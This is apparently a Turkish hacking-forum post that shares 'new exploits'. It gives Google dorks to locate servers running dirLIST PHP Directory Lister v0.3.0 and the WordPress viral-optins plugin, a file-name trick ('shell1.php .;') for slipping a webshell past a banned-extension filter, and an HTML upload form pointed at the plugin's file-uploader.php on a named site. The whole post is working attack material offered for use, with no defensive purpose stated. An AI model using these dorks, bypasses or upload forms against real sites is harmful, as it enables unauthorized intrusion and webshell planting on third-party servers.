Meraba arkadaşlar.Bugün sizlerle yepyeni exploitler paylaşacağım.
Google Dork : "dirLIST - PHP Directory Lister" "Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx" "index of" exthp
Açıklama ve Kullanımı : Example to exploit it using a form in PHP and upload a webshell.
Remember, rename your webshell.
If your webshell is called "shell1.php" rename "shell1.php .;"
Açık : Find vulnerable servers: dirLIST - PHP Directory Lister v0.3.0
Google Dork:
inurl:/wp-content/plugins/viral-optins/
Exploit:
https://site.com/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
<form method="POST" action="http://sitekibrisli.com/wp-content/plugins/viral-optins/api/uploader/file-uploader.php/" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>